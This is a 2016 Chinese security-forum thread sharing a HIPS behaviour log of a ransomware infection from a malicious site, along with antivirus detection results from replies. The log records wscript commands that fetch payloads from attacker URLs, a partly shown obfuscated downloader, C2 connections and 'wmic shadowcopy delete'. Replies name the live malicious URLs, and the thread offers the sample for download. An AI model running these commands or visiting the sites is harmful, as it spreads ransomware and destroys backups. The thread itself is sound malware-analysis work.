收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 再次进入神网
1234下一页
返回列表 发新帖
查看: 12648|回复: 34
收起左侧

[其它] 再次进入神网

  [复制链接]
liulangzhecgr
发表于 2016-4-26 11:06:56 | 显示全部楼层 |阅读模式
本帖最后由 liulangzhecgr 于 2016-4-26 15:20 编辑

系统:win7 x32
基本用户运行系统

2016/4/26 10:39:48    访问COM接口    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: {B43A0C1E-B63F-4691-B68F-CD807A45DA01} MSTSWebProxy.MSTSWebProxy.1
文件路径: %SystemRoot%\system32\TSWbPrxy.exe
规则: [应用程序]c:\program files\internet explorer\iexplore.exe

2016/4/26 10:39:53    创建新进程    允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\tswbprxy.exe
命令行: C:\Windows\system32\TSWbPrxy.exe -Embedding
规则: [应用程序]c:\windows\system32\svchost.exe

2016/4/26 10:40:04    创建新进程    允许
进程: c:\windows\system32\tswbprxy.exe
目标: c:\windows\system32\wscript.exe
命令行: //B //E:JScript "C:\Users\yiqing\AppData\Local\Temp\Low\q9ah.tmp" "srbmtfezfy" "http://nuulfz.lotell.top/blade/messenger-30791247" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.307
规则: [应用程序]*

2016/4/26 10:40:10    访问网络    允许
进程: c:\windows\system32\wscript.exe
目标: TCP [本机 : 49518] ->  [185.58.224.173 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:40:15    创建新进程    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd.exe /q /c cd /d "%tmp%" && echo var o=function(a){return new ActiveXObject(a)},y=function(i){return ("WinH"+"TTP,Re"+"quest.5.1,GET,Scri"+"pting.Fil"+"eSystemObject,WScr"+"ipt.Sh"+"ell,ADODB.Stream,Arguments,.e"+"xe,GetTe"+"mpName,charCodeAt,iso-8859-1,,i
规则: [应用程序]c:\program files\internet explorer\iexplore.exe

2016/4/26 10:40:21    创建文件    允许
进程: c:\windows\system32\wscript.exe
目标: C:\Users\yiqing\AppData\Local\Temp\rad81C48.tmp.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

2016/4/26 10:40:26    向其他进程发送消息    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\cmd.exe
消息: WM_SETICON
规则: [应用程序]*

2016/4/26 10:40:33    创建新进程    允许
进程: c:\windows\system32\wscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\Windows\System32\cmd.exe" /c rad81C48.tmp.exe
规则: [应用程序]*

2016/4/26 10:40:50    向其他进程复制句柄    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\cmd.exe
句柄: (Event) 0x0000007C
规则: [应用程序]*

2016/4/26 10:40:58    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\wscript.exe
命令行: wscript  //B //E:JScript g7df.tmp "srbmtfezfy" "http://nuulfz.lotell.top/sufficient/absolute-morrow-damn-28373606" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
规则: [应用程序]*

2016/4/26 10:41:00    向其他进程复制句柄    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\cmd.exe
句柄: (Event) 0x00000078
规则: [应用程序]*

2016/4/26 10:41:01    访问网络    允许
进程: c:\windows\system32\wscript.exe
目标: TCP [本机 : 49519] ->  [185.58.224.173 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:05    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\users\yiqing\appdata\local\temp\rad81c48.tmp.exe
命令行: rad81C48.tmp.exe
规则: [应用程序]*

2016/4/26 10:41:15    创建文件    允许
进程: c:\users\yiqing\appdata\local\temp\rad81c48.tmp.exe
目标: C:\Users\yiqing\Documents\cgpomewoynhb.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

2016/4/26 10:41:21    修改文件    允许
进程: c:\users\yiqing\appdata\local\temp\rad81c48.tmp.exe
目标: C:\Users\yiqing\Documents\cgpomewoynhb.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

2016/4/26 10:41:23    设置文件隐藏属性    允许
进程: c:\users\yiqing\appdata\local\temp\rad81c48.tmp.exe
目标: C:\Users\yiqing\Documents\cgpomewoynhb.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

2016/4/26 10:41:25    创建新进程    允许
进程: c:\users\yiqing\appdata\local\temp\rad81c48.tmp.exe
目标: c:\users\yiqing\documents\cgpomewoynhb.exe
命令行: C:\Users\yiqing\Documents\cgpomewoynhb.exe
规则: [应用程序]*

2016/4/26 10:41:29    创建新进程    阻止
进程: c:\users\yiqing\appdata\local\temp\rad81c48.tmp.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\yiqing\AppData\Local\Temp\RAD81C~1.EXE >> NUL
规则: [应用程序]*

2016/4/26 10:41:29    结束其他进程    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: c:\windows\system32\cmd.exe
规则: [应用程序]*

2016/4/26 10:41:29    修改注册表值    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections
值: 0x00000001(1)
规则: [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\*

2016/4/26 10:41:31    访问网络    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49520] ->  [45.79.161.27 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:33    访问网络    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49521] ->  [108.167.181.253 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:34    访问网络    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49522] ->  [192.185.225.22 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:36    访问网络    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49523] ->  [192.185.46.61 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:36    访问网络    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49524] ->  [72.167.232.144 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:37    访问网络    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49525] ->  [182.50.158.108 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:41:41    创建新进程    允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\wbem\wmic.exe
命令行: "C:\Windows\System32\wbem\WMIC.exe"  shadowcopy delete /nointeractive
规则: [应用程序]c:\windows\system32\svchost.exe

2016/4/26 10:41:50    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\Public\Documents\Tencent\QQGameMicro\web\js\head.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:41:54    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\users\yiqing\documents\cgpomewoynhb.exe
句柄: (Process) c:\windows\system32\wbem\wmic.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2016/4/26 10:42:03    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\Public\Documents\Tencent\QQGameMicro\web\js\jquery-1.4.2.min.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:42:07    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\users\yiqing\documents\cgpomewoynhb.exe
句柄: (Thread) c:\windows\system32\wbem\wmic.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2016/4/26 10:42:11    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\Public\Documents\Tencent\QQGameMicro\web\js\jquery.jscroll.min.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:42:15    向其他进程发送消息    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\wbem\wmic.exe
消息: WM_SETICON
规则: [应用程序]*

2016/4/26 10:42:19    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\Public\Documents\Tencent\QQGameMicro\web\js\left.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:42:22    向其他进程发送消息    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\wbem\wmic.exe
消息: WM_GETICON
规则: [应用程序]*

2016/4/26 10:42:25    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\Public\Documents\Tencent\QQGameMicro\web\js\search_v1.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:42:32    向其他进程发送消息    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\wbem\wmic.exe
消息: WM_GETICON
规则: [应用程序]*

2016/4/26 10:42:35    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\Public\Thunder Network\XMP5\V5.1.26.4342\Program\XmpIEStat.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:42:39    向其他进程发送消息    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\wbem\wmic.exe
消息: WM_SETICON
规则: [应用程序]*

2016/4/26 10:42:47    向其他进程发送消息 (2)    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\wbem\wmic.exe
消息: WM_GETICON
规则: [应用程序]*

2016/4/26 10:42:53    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\yiqing\AppData\LocalLow\Thunder Network\Thunder BHO Platform\package\current\thunderdownload\com\xmpspread.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:42:56    向其他进程复制句柄    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\wbem\wmic.exe
句柄: (Event) 0x00000078
规则: [应用程序]*

2016/4/26 10:42:59    修改文件    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: C:\Users\yiqing\AppData\LocalLow\Thunder Network\Thunder BHO Platform\package\current\thunderdownload\com\xmpthunderdl.js
规则: [文件组]所有执行文件 -> [文件]*; *.js

2016/4/26 10:43:49    创建新进程    允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\dllhost.exe
命令行: C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
规则: [应用程序]c:\windows\system32\svchost.exe

2016/4/26 10:44:56    创建新进程    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: c:\windows\system32\notepad.exe
命令行: "C:\Windows\System32\NOTEPAD.EXE" C:\Users\yiqing\Desktop\-!RecOveR!-mjbde++.Txt
规则: [应用程序]*

2016/4/26 10:45:00    向其他进程发送消息    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: c:\program files\internet explorer\iexplore.exe
消息: WM_DDE_EXECUTE
规则: [应用程序]*

2016/4/26 10:45:04    访问网络    允许
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: TCP [本机 : 49529] ->  [45.79.161.27 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/4/26 10:45:17    创建新进程    阻止
进程: c:\users\yiqing\documents\cgpomewoynhb.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\yiqing\DOCUME~1\CGPOME~1.EXE >> NUL
规则: [应用程序]*



不知怎么搞的明确运行完勒索病毒!因勒索照片曾现在屏幕---貌似什么东东需要权限!
眼花缭乱,不添加评语!

-!RecOveR!-mjbde .Png cgpomewoynhb.rar (253.89 KB, 下载次数: 665)

评分

参与人数 1人气 +1 收起 理由
qftest + 1 MD很帅啊

查看全部评分

回复

举报

345
发表于 2016-4-26 11:30:30 | 显示全部楼层
网址密我一下,我逛逛
回复

举报

z2009
发表于 2016-4-26 11:46:17 | 显示全部楼层
360下载保护杀,过AGP网页防护
恢复,双击,AGP杀
回复

举报

liulangzhecgr
 楼主| 发表于 2016-4-26 11:47:41 | 显示全部楼层
本帖最后由 liulangzhecgr 于 2016-4-26 12:25 编辑
345 发表于 2016-4-26 11:30
网址密我一下,我逛逛


删除链接!
回复

举报

skyboybone
发表于 2016-4-26 11:48:17 | 显示全部楼层
金山本地引擎
截图20160426114759.png

评分

参与人数 1人气 +1 收起 理由
liulangzhecgr + 1 毒霸表现不差哦!

查看全部评分

回复

举报

345
发表于 2016-4-26 11:50:51 | 显示全部楼层
本帖最后由 345 于 2016-4-26 12:25 编辑
liulangzhecgr 发表于 2016-4-26 11:47
新神网出现~~2个DLL,喜欢测试主防、hips的速度,内有新神网地址


hxxp://nuulfz.lotell.top
回复

举报

liulangzhecgr
 楼主| 发表于 2016-4-26 11:53:14 | 显示全部楼层
本帖最后由 liulangzhecgr 于 2016-4-26 12:24 编辑
345 发表于 2016-4-26 11:50
http://nuulfz.lotell.top


no !

hxxp://indies-kitayama.com/

第三次进神网---没有行为!

评分

参与人数 1经验 +5 收起 理由
绯色鎏金 + 5 感谢支持,建议去掉url标签

查看全部评分

回复

举报

345
发表于 2016-4-26 11:54:48 | 显示全部楼层
liulangzhecgr 发表于 2016-4-26 11:53
no !

http://indies-kitayama.com/

我逛逛感谢分享

评分

参与人数 1人气 +1 收起 理由
liulangzhecgr + 1 感谢支持,欢迎常来: )

查看全部评分

回复

举报

xyz0703
发表于 2016-4-26 11:57:18 | 显示全部楼层
Avira
[mw_shl_code=css,true]
类型:        文件
来源:        C:\Users\Yizhou\Desktop\cgpomewoynhb.exe
状态:        受感染
隔离对象:        305c525b.qua
已还原::        否
已上传到 Avira:        否
操作系统:        Windows XP/VISTA Workstation/Windows 7
搜索引擎:        8.03.38.34
病毒定义文件:        8.12.83.180
检测:        TR/Crypt.ZPACK.Gen2
日期/时间:        2016/4/26 星期二, 11:55[/mw_shl_code]

[mw_shl_code=css,true]


类型:        文件
来源:        C:\Users\Yizhou\Desktop\rad81C48.tmp.exe
状态:        受感染
隔离对象:        75d47f5c.qua
已还原::        否
已上传到 Avira:        否
操作系统:        Windows XP/VISTA Workstation/Windows 7
搜索引擎:        8.03.38.34
病毒定义文件:        8.12.83.180
检测:        TR/Crypt.ZPACK.Gen2
日期/时间:        2016/4/26 星期二, 11:55[/mw_shl_code]

评分

参与人数 1人气 +1 收起 理由
liulangzhecgr + 1 感谢支持,欢迎常来: )

查看全部评分

回复

举报

345
发表于 2016-4-26 12:02:11 | 显示全部楼层
不鸟我!没反应。。。。

评分

参与人数 1人气 +1 收起 理由
Heavev + 1 难道不发下签名档番号???

查看全部评分

回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-30 15:28 , Processed in 0.120517 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表